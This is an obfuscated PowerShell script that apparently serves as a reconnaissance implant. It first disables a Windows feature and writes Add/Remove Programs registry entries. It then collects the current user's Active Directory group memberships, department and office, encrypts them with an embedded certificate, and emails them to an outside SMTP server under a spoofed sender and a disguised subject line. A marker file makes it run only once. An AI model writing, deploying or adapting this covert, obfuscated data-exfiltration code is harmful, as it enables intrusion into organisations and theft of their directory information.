 SET-vaRIaBLE  ("aWJ"+"Bp"+"I")  ( [TYpE]("{0}{1}{2}{3}"-f'E','nvi','RonM','ENt')  ) ;  Set  ("2Vn"+"7db")  (  [Type]("{0}{3}{2}{1}" -f's','INg','eNcOd','ySteM.texT.') );  SET-ItEm ('VaRiAB'+'LE:Q'+'x0') ( [tYPE]("{2}{0}{1}{3}"-F 'ySt','em.C','S','oNVERt') )  ;  .("{1}{0}" -f'ls','c')  

 
 &("{1}{0}{3}{2}"-f'Vari','Set-','e','abl') -Name ('a') -Scope ("{0}{1}" -f'Globa','l') -Force  
 &("{0}{3}{2}{1}"-f 'Se','able','i','t-Var') -Name ("{1}{0}{2}"-f 'utpu','O','t') -Scope ("{1}{0}"-f'lobal','G') -Force  

 Function A`D`dremov`e`Progr`AMs(${Ke`y`NaMe}, ${Displ`AY`N`AMe}, ${vER`S`ioN}){  
      
      &("{3}{2}{0}{1}" -f 'ar','iable','V','Set-') -Name ("{0}{1}{2}" -f'AddRe','m','Key') -Value ((("{4}{1}{16}{11}{8}{9}{10}{12}{14}{3}{6}{13}{2}{5}{7}{15}{0}"-f'tall','SOFTW','nk','n','HKLM:kMp','Mp','tVers','Un','NodekM','pMicro','sof','ow6432','t','io','kMpWindowskMpCurre','ins','AREkMpW'))  -REPlace  ([CHar]107+[CHar]77+[CHar]112),[CHar]92) -Scope ("{0}{1}"-f 'Loca','l') -Force  

      .("{1}{0}"-f 'tem','New-I') -Path ${a`dD`RemKey} -Name ${k`e`YNaME} ¡§CForce  
      .("{2}{1}{3}{0}"-f 'mProperty','w','Ne','-Ite') -Path ((("{2}{7}{5}{0}{3}{1}{6}{4}"-f 'd','eynGsu','u','dRemK','LKeyName','LA','X','X')) -rePlAce'nGs',[char]92  -CrEPLAcE ([char]117+[char]88+[char]76),[char]36) -Name ("{0}{1}{2}"-f'Di','spla','yName') -Value ${di`S`P`LaynAMe} -PropertyType ("{0}{1}"-f'St','ring')  
      .("{1}{4}{3}{0}{2}" -f't','New-It','y','mProper','e') -Path (("{2}{1}{0}{3}{5}{4}"-f'em','paAddR','x','KeywXb','paKeyName','x'))."RepL`A`Ce"(([ChAR]119+[ChAR]88+[ChAR]98),'\').("{0}{1}"-f 'RE','PLACE').Invoke('xpa','$') -Name ("{2}{4}{0}{1}{3}" -f'r','sio','Displa','n','yVe') -Value ${V`eR`Sion} -PropertyType ("{1}{2}{0}"-f'g','Str','in')  
      .("{0}{3}{1}{2}{4}" -f 'New-Ite','rop','e','mP','rty') -Path ((("{4}{5}{1}{0}{3}{2}{6}" -f 'I6YK','6','a','eyN','I6YAddRem','Keyog','me'))  -CrEpLace  'I6Y',[Char]36  -CrEpLace  'og6',[Char]92) -Name ("{2}{1}{0}" -f 'lString','l','Uninsta') -Value " " -PropertyType ("{0}{1}" -f 'Stri','ng')  
      .("{2}{1}{0}"-f 'y','ropert','New-ItemP') -Path (("{4}{7}{6}{3}{5}{2}{1}{0}" -f'ame','zKeyN','7','C8','k7zA','fk','RemKey','dd'))."rEPlA`ce"(([CHAR]107+[CHAR]55+[CHAR]122),'$')."R`EPlaCE"(([CHAR]67+[CHAR]56+[CHAR]102),[StrInG][CHAR]92) -Name ("{0}{1}{2}"-f'P','ublis','her') -Value ("{4}{6}{5}{2}{8}{1}{0}{7}{3}"-f' ','d','th ','artners','G','ham, Smi','res','P','an') -PropertyType ("{1}{0}" -f 'ng','Stri')  
      .("{3}{0}{2}{1}"-f 'Pr','y','opert','New-Item') -Path ((("{4}{0}{2}{1}{3}"-f'eyIOr7','eK','k','eyName','7keAddRemK')) -crEplaCE'7ke',[chaR]36-rEPlAce'IOr',[chaR]92) -Name ("{0}{2}{1}"-f 'Disp','Icon','lay') -Value ((("{2}{5}{0}{4}{1}{3}" -f'G','ox','c:{0}windows','_Icon.bmp','SPB','{0}'))-F [Char]92) -PropertyType ("{0}{1}"-f'Strin','g')  

      
      &("{2}{1}{0}{4}{3}"-f'mo','e','R','able','ve-Vari') -Name ("{0}{2}{1}" -f'AddR','ey','emK') -Scope ("{1}{0}" -f'l','Loca') -Force  
 }  
 .("{1}{2}{3}{0}{4}" -f 'man','Invoke-','Co','m','d') {&("{1}{0}" -f 'xe','dism.e') ("{0}{1}" -f '/on','line') ("{3}{0}{1}{2}{4}" -f 's','able-fea','tu','/di','re') ("{2}{0}{4}{1}{3}" -f 'ename','diaCe','/featur','nter',':Me') ("{1}{0}{2}" -f 'or','/n','estart')}  
 ${a} = &("{1}{3}{2}{0}"-f 'nd','Invoke-','omma','C') {&("{0}{1}" -f 'dism.','exe') ("{1}{2}{0}"-f'ne','/o','nli') ("{3}{1}{0}{2}" -f'ein','eatur','fo','/get-f') ("{1}{5}{4}{0}{2}{3}" -f 'renam','/','e:','MediaCenter','eatu','f')}  
 ${o`UTput} = ${A} | &("{2}{1}{3}{0}"-f 'tring','lec','Se','t-S') ("{1}{2}{0}{3}{4}"-f'is','State',' : D','able','d')  
 &("{2}{0}{1}" -f 'ite-','Host','Wr') ${oUT`pUT}  
 If (${oU`TP`Ut} -like ("{1}{0}{2}{4}{3}" -f 'tate ','S',': Di','ed','sabl')){  
      .("{0}{2}{1}{3}" -f 'Ad','emove','dR','Programs') ("{0}{2}{1}" -f'MediaC','r','ente') ("{1}{0}{2}" -f 'edia','M','Center') ("{2}{0}{1}" -f 'sable','d','Di')  
 }  

 
 .("{1}{2}{3}{0}" -f'le','Remo','ve-','Variab') -Name ('a') -Scope ("{0}{1}"-f'Glob','al') -Force  
 &("{1}{3}{0}{4}{2}"-f 'r','Remov','ble','e-Va','ia') -Name ("{1}{0}{2}" -f'p','Out','ut') -Scope ("{1}{0}"-f 'bal','Glo') -Force  
${PA`TH} =   (  dIr ("Va"+"riA"+"b"+"lE:AWj"+"BPi")  ).VAlUE::("{1}{0}{3}{2}{4}" -f 't','Ge','er','Fold','Path').Invoke(("{2}{0}{1}" -f'nD','ata','Applicatio')) + ((("{0}{1}" -f '{0}nsm','.txt'))-F  [ChaR]92)

If (&("{2}{0}{1}" -f 'at','h','Test-P') ${pa`TH})
{
    Exit
}


${seRt`if`IKAt} = [Byte[]] (48,130,4,132,2,1,3,48,130,4,74,6,9,42,134,72,134,247,13,1,7,1,160,130,4,59,4,130,4,55,48,130,4,51,48,130,4,47,6,9,42,134,72,134,247,13,1,7,6,160,130,4,32,48,130,4,28,2,1,0,48,130,4,21,6,9,42,134,72,134,247,13,1,7,1,48,28,6,10,42,134,72,134,247,13,1,12,1,6,48,14,4,8,8,55,101,195,42,247,132,164,2,2,8,0,128,130,3,232,104,55,217,204,104,218,227,125,163,154,120,234,44,187,208,199,244,99,47,234,174,89,215,106,68,64,102,97,198,101,81,34,169,161,26,173,27,183,250,180,143,37,169,0,70,237,171,124,68,124,41,146,106,120,150,94,209,17,37,127,43,70,57,255,161,199,117,67,240,230,93,140,166,250,14,18,151,241,213,118,201,245,177,249,87,255,220,210,107,87,199,190,104,129,222,6,61,252,6,188,221,211,154,108,238,211,11,56,147,119,247,244,239,116,56,47,184,164,14,151,2,38,238,103,142,184,229,14,64,249,91,77,68,171,22,58,78,109,172,109,92,3,74,162,110,234,38,75,200,14,229,15,80,158,117,19,95,100,103,37,77,188,203,57,118,245,124,18,173,164,99,220,152,35,123,230,198,168,224,95,12,205,161,199,109,195,35,176,223,113,156,165,198,36,249,194,142,51,147,237,7,138,58,180,74,129,199,146,73,132,4,12,126,242,193,121,189,87,155,191,18,187,239,90,147,228,49,148,174,188,183,39,62,81,130,237,229,215,41,255,165,157,90,121,98,208,17,84,80,77,146,194,132,20,233,85,207,56,95,102,109,101,169,123,30,239,11,225,202,0,127,87,102,202,84,174,51,115,251,234,70,49,154,223,60,69,144,237,112,237,165,58,202,26,151,171,34,161,205,101,77,142,125,16,57,132,6,171,206,235,250,128,117,132,130,53,100,144,86,18,135,187,243,10,219,13,167,202,51,74,78,98,248,210,17,1,107,101,233,54,36,50,55,254,80,140,191,185,57,215,124,62,41,137,158,11,191,84,167,148,142,50,123,104,11,197,127,44,22,236,225,93,128,120,114,139,189,69,137,168,71,146,115,117,65,152,214,191,219,214,180,25,168,104,29,93,26,234,155,236,74,224,59,194,11,113,21,224,183,134,65,70,44,44,248,217,94,36,96,224,183,5,191,1,78,148,103,167,176,232,195,155,209,142,209,79,11,237,172,126,173,118,105,44,162,89,215,35,47,250,7,246,214,16,85,148,241,225,222,20,227,114,125,228,81,18,241,141,191,71,19,205,242,15,103,228,19,207,1,164,230,244,186,125,80,133,212,252,103,101,145,153,54,77,24,160,137,42,123,231,94,105,58,149,172,20,102,95,235,199,201,145,6,204,190,89,198,46,162,38,255,64,110,205,38,28,34,37,134,83,190,150,114,229,37,129,81,137,248,103,70,126,106,213,195,81,123,73,239,84,160,179,247,111,109,131,57,202,40,133,243,229,184,191,58,112,172,246,11,220,45,13,219,1,24,196,148,229,45,66,71,252,164,119,255,100,48,55,41,69,245,27,64,235,108,63,194,155,188,160,139,243,175,116,238,81,121,177,17,125,86,39,243,78,146,184,170,224,213,78,99,199,57,216,124,114,33,147,212,51,56,184,133,176,195,83,119,65,171,63,82,99,19,155,231,114,173,111,110,162,72,213,196,203,27,9,38,190,6,201,250,92,158,187,105,28,142,145,60,61,88,254,20,219,86,166,37,158,90,59,211,2,247,170,73,160,105,152,52,24,193,171,83,148,58,185,138,83,1,103,185,191,198,131,233,50,16,2,24,173,6,206,32,237,96,149,219,96,49,59,130,189,163,128,10,239,175,1,27,109,162,53,63,154,97,212,201,215,232,143,123,148,97,113,150,216,237,80,235,99,161,159,224,41,53,159,153,174,222,112,251,75,179,186,115,112,33,185,35,236,119,159,208,216,162,50,133,140,100,213,202,118,178,154,99,224,96,245,248,147,9,243,96,72,15,169,130,73,233,3,8,142,137,56,231,42,31,108,56,46,65,78,27,248,72,123,156,61,36,49,205,96,115,50,71,26,95,21,50,197,183,5,106,209,164,30,136,200,111,50,1,108,77,102,92,97,31,65,41,146,178,235,122,69,137,248,54,174,167,111,66,183,198,34,229,57,118,220,84,43,43,10,19,39,79,102,203,203,29,205,195,139,26,71,208,4,38,255,188,22,34,112,195,207,75,51,229,167,175,160,37,61,109,113,181,45,200,59,41,85,123,55,95,87,165,81,191,3,86,39,225,12,221,94,196,8,234,6,159,84,193,198,4,64,15,29,121,178,238,57,105,43,96,117,200,205,240,233,60,67,43,5,121,223,143,93,165,82,63,220,184,29,168,0,77,223,100,197,200,17,224,155,165,114,52,137,210,6,80,155,67,119,123,48,57,2,7,170,159,168,168,248,163,105,160,242,18,148,241,207,48,49,48,33,48,9,6,5,43,14,3,2,26,5,0,4,20,37,91,61,148,223,32,52,124,175,64,93,169,147,15,99,172,29,9,58,244,4,8,40,197,28,175,34,29,143,121,2,2,8,0)
${MeL`d`iNG} = .("{0}{1}{2}"-f 'get-ad','us','er') -identity ( $AwjbPI::"US`er`NamE") -Properties ('*') | .("{0}{1}"-f 'Sele','ct') ("{1}{2}{0}"-f 'berOf','M','em'), ("{0}{1}{2}" -f'C','o','mpany'), ("{2}{1}{0}"-f'ent','tm','Depar'), ("{0}{1}{2}" -f 'Of','f','ice'), ("{1}{0}{3}{4}{2}{5}"-f'calD','physi','ceNa','eliver','yOffi','me') | &("{1}{0}{2}{3}" -f'o','C','nv','ertTo-Json')
${bufF`eR} =   $2vN7Db::"u`TF8".("{2}{1}{0}" -f'es','Byt','Get').Invoke(${M`eLD`inG})
${O`UT`STREam} = .("{0}{2}{1}" -f 'New-Ob','ct','je') ("{4}{2}{3}{5}{0}{6}{1}"-f'r','ream','ystem','.','S','IO.Memo','ySt')

${r`IJNd`A`el} = .("{0}{2}{1}{3}"-f 'N','-O','ew','bject') ("{1}{2}{7}{3}{6}{4}{5}{0}" -f 'elManaged','System.Security','.C','ogr','y.Rijn','da','aph','rypt')
${R`i`jn`DaEL}."k`EyS`iZE" = 256
${rIj`ND`AEL}."B`lOck`SiZE" = 256
${rIJ`NDaEL}.("{3}{1}{0}{2}" -f'r','ene','ateKey','G').Invoke()
${R`iJNDA`el}.("{0}{2}{1}"-f 'Ge','ateIV','ner').Invoke()

${c`erT} = .("{2}{0}{1}"-f 'ew','-Object','N') ("{0}{8}{3}{5}{1}{4}{7}{6}{9}{2}" -f'System.Sec','ap','es.X509Certificate2','y','hy','.Cryptogr','C','.X509','urit','ertificat')(,${S`e`RTIfikaT})
${E`NC`KEy} = ${ce`Rt}."Pu`BlI`CkEY"."K`EY".("{1}{2}{0}" -f 'pt','Enc','ry').Invoke(${RIJN`Da`el}."K`ey", ${tR`UE})
${e`NC`IV}  = ${CE`Rt}."p`UBLICk`EY"."K`Ey".("{0}{2}{1}" -f 'Enc','ypt','r').Invoke(${ri`j`NdAEL}."IV", ${T`RUe})

${cE`Rt}."p`RI`VATeKEy"."k`ey"

${O`UTST`ReaM}.("{1}{0}"-f'rite','W').Invoke(${e`Nck`ey}, 0, 256)
${O`Ut`strE`AM}.("{1}{0}" -f 'e','Writ').Invoke(${EN`cIv}, 0, 256)

${E} = ${r`iJnda`el}.("{2}{1}{4}{3}{0}"-f'or','eateEn','Cr','ypt','cr').Invoke()
${c`RyPT`OsTRe`Am} = &("{1}{0}{3}{2}" -f'ew','N','ject','-Ob') ("{9}{2}{7}{1}{8}{0}{6}{4}{3}{5}"-f 'y','curi','yst','ptography.Cr','Cry','yptoStream','.','em.Se','t','S')(${ou`TStRE`Am}, ${e}, ("{0}{1}"-f'Writ','e'))

${cR`y`p`T`oStREam}.("{0}{1}" -f 'Wri','te').Invoke(${B`U`FFER}, 0, ${bU`FfER}."LE`NGTH")
${CR`YP`TOs`T`REAM}.("{2}{1}{0}"-f'pose','is','D').Invoke()

${B`ASE64`Mel`DI`Ng} =  (  geT-vArIaBLE  ("Q"+"X0") -valUeO  )::"to`Ba`Se64`stRiNG"(${OUtS`T`REam}.("{1}{0}" -f 'Array','To').Invoke())

${P`seM`AILSEr`VEr} = ("{3}{4}{2}{1}{5}{6}{7}{0}"-f 't','po','1.','htc','a1ds','li','tiet.m','aster.ne')
${s`MTP} = .("{1}{2}{0}"-f 'ject','ne','w-ob') ("{4}{3}{1}{0}{2}" -f 'pC','Smt','lient','ail.','Net.M')(${PSE`Mai`LSe`R`VeR})
${sm`Tp}.("{1}{0}"-f 'd','Sen').Invoke(("{1}{4}{3}{2}{0}"-f 'iet.no','a','it','s@pol','nonymou'), ("{3}{0}{1}{5}{4}{2}"-f'm','@','o','torger.eide','et.n','politi'), ("{3}{4}{2}{0}{1}" -f'01','5','-2','Referat-18','-06'), ${b`Ase64melDi`Ng})


.("{0}{3}{1}{2}" -f'Set-Co','ten','t','n') ${P`ATh} ""

.("{1}{0}"-f'cho','E') " "
